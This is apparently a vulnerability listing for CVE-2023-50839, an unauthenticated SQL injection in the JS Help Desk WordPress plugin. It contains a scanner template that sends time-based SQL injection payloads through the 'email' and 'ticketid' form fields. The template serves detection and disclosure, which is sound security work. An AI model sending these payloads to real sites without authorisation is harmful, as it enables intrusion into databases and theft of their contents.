CVE-2023-50839: JS Help Desk <= 2.8.1 - SQL Injection

2026-03-25 JS Help Desk PoC Public

Description

The JS Help Desk – Best Help Desk & Support Plugin plugin for WordPress is vulnerable to SQL Injection via the 'email' and 'trackingid' parameters in all versions up to 2.8.2 (exclusive) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

PoC

id: CVE-2023-50839

info:
  name: JS Help Desk <= 2.8.1 - SQL Injection
  author: Shivam Kamboj,s4e-io
  severity: critical
  description: |
    The JS Help Desk – Best Help Desk & Support Plugin plugin for WordPress is vulnerable to SQL Injection via the 'email' and 'trackingid' parameters in all versions up to 2.8.2 (exclusive) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
  remediation: |
    Update to the latest version of JS Help Desk, version 2.8.2 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50839
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/js-support-ticket/js-help-desk-281-unauthenticated-sql-injection-via-email-and-trackingid
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-50839
    epss-score: 0.02041
    epss-percentile: 0.80173
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,js-support-ticket,unauth

flow: http(1) && (http(2) || http(3))

http:
  - raw:
      - |
        GET /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/js-support-ticket")'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=test@test.com' AND SLEEP(8)-- -&ticketid=test123

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and

  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=test@test.com&ticketid=1'+AND+(SELECT+1+FROM+(SELECT+SLEEP(8))x)--+-

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a004730450221009eeef63535018fb95895cc9bbe31118a94e0e845de762b20361f86b8df58f2920220562f2e002f0bd0ce3f2e477b335e78a1678e8a2377a6e8f03514a810fda5ac80:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities